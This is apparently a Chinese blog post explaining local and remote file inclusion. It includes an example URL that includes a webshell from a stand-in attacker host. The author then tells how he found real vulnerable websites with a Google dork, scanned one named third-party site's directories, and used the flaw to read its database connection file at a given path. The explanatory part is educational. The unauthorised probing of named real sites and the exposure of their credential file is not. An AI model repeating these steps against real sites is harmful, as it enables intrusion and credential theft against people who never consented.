文件包含漏洞

1、什么是文件包含漏洞

文件包含,包括本地文件包含(Locao file inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种形式。

首先,本地文件包含就是通过浏览器引进(包含)Web服务器上的文件,这种漏洞一般发生在浏览器包含文件时没有进行严格的过滤,允许遍历目录的字符注入浏览器并执行(比如:asp?file=index.html)。

其次,远程文件简称RFI,该漏洞允许攻击者包含一个远程的文件,一般是远程服务器上的预先设置好的脚本,这种漏洞是由于浏览器对于用户输入没有进行检测,导致不同程度的信息泄露、拒绝服务攻击甚至在目标服务器上执行代码(比如:asp?file=http://www.hacker.com/webshell/shell.asp)。

2、文件包含漏洞的危害

这类漏洞看起来貌似并不严重,一旦被恶意利用则会带来很大的危害。本地文件包含不仅能够包含web文件目录中的一些配置文件(比如Web应用、数据库配置文件、config文件),还可以查看到一些Web动态页面的源代码,为攻击者进一步发掘web应用漏洞提供条件,甚至一旦与路径遍历漏洞相结合,还可能直接攫取目标系统的用户名与密码等文件。

3、纸上得来终觉浅,绝知此事要躬行

我们同样利用google关键词搜索找到可能含有文件包含的漏洞:inurl:php?file=

尼玛,现在的网站基本上把file当成是数据库参数,找到sql注入的倒是不少


4、再找找

http://www.adlinktech.com/cn/contact_us/contactus.php?file=contactus.htm

这个试了下不行,估计对字符进行了过滤

哈哈,下午又没事重新找了下发现:http://www.sccy.cn/doc_template.asp?file=/01/014433-201110022.htm

直接跑出来本地asp文件。

5、wwwscan扫描网站目录:

6、直接查看本地连接数据库文件/admin/conn.asp

view-source:http://www.sccy.cn/doc_template.asp?file=/admin/conn.asp

其实这也不是严格意义的文件包含,因为只是读取


  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值